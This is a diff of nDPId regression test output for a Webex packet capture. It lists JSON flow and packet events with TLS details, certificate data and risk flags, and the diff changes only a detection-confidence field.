+00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01854{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570633357,"flow_last_seen":1444570633357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570633357,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1444570633357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570633357,"pkt":"ABoRAAACABoRAAABCABFAAA87DBAAEAGmtcKCAABQERpZ6GOAbtaKC3iAAAAAKACOQht0gAAAgQFtAQCCAoATMHSAAAAAAEDAwY="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1444570633360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAoAXpAABAGtaJARGlnCggAAQG7oY6l19IdWigt41AS\/\/9Y1AAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1444570633360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAo7DFAAEAGmuoKCAABQERpZ6GOAbtaKC3jpdfSHlAQOQgfzQAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636151,"flow_last_seen":1444570636151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1444570636151,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636151,"pkt":"ABoRAAACABoRAAABCABFAAA8tbVAAEAGMwwKCAABch3V1KL+AbsYGndcAAAAAKACOQjFmAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1444570636154,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAoAY1AABAGF0lyHdXUCggAAQG7ov7n5YijGBp3XVAS\/\/+5HQAA"} 
@@ -57,24 +57,24 @@ 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636155,"flow_last_seen":1444570636155,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636155,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1444570636155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636155,"pkt":"ABoRAAACABoRAAABCABFAAA8NxlAAEAGu0sKCAABch3MMcm+AbvkVPXwAAAAAKACOQhdrAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1444570636157,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636157,"pkt":"ABoRAAACABoRAAABCABFAAAoAY5AABAGIOtyHcwxCggAAQG7yb4bqwoP5FT18VAS\/\/+cAAAA"} 
-00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1444570636158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636158,"pkt":"ABoRAAACABoRAAABCABFAAAoNxpAAEAGu14KCAABch3MMcm+AbvkVPXxG6sKEFAQOQhi+QAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636160,"flow_last_seen":1444570636160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636160,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1444570636160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636160,"pkt":"ABoRAAACABoRAAABCABFAAA80GxAAEAGr+EKCAAB0cXen7mKAbt7nBKGAAAAAKACOQhH7AAAAgQFtAQCCAoATMLqAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1444570636163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAoAZFAABAGrtHRxd6fCggAAQG7uYqEY+15e5wSh1AS\/\/86HgAA"} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1444570636163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAo0G1AAEAGr\/QKCAAB0cXen7mKAbt7nBKHhGPtelAQOQgBFwAA"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636160,"flow_last_seen":1444570636164,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 
or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636170,"flow_last_seen":1444570636170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636170,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1444570636170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636170,"pkt":"ABoRAAACABoRAAABCABFAAA8c99AAEAGAvcKCAABQER5meEvAbvnI7E0AAAAAKACOQgMmAAAAgQFtAQCCAoATMLrAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1444570636175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoAZNAABAGpVdARHmZCggAAQG74S8Y3E7L5yOxNVAS\/\/8JAQAA"} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1444570636175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636175,"pkt":"ABoRAAACABoRAAABCABFAAAoc+BAAEAGAwoKCAABQER5meEvAbvnI7E1GNxOzFAQOQjP+QAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636170,"flow_last_seen":1444570636176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636176,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636180,"flow_last_seen":1444570636180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636180,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1444570636180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636180,"pkt":"ABoRAAACABoRAAABCABFAAA8nw9AAEAGbDMKCAABPm3nA7L2AbufQl3jAAAAAKACOQhqbwAAAgQFtAQCCAoATMLsAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1444570636183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636183,"pkt":"ABoRAAACABoRAAABCABFAAAoAZVAABAGOcI+becDCggAAQG7svZgvaIcn0Jd5FAS\/\/\/LpgAA"} 
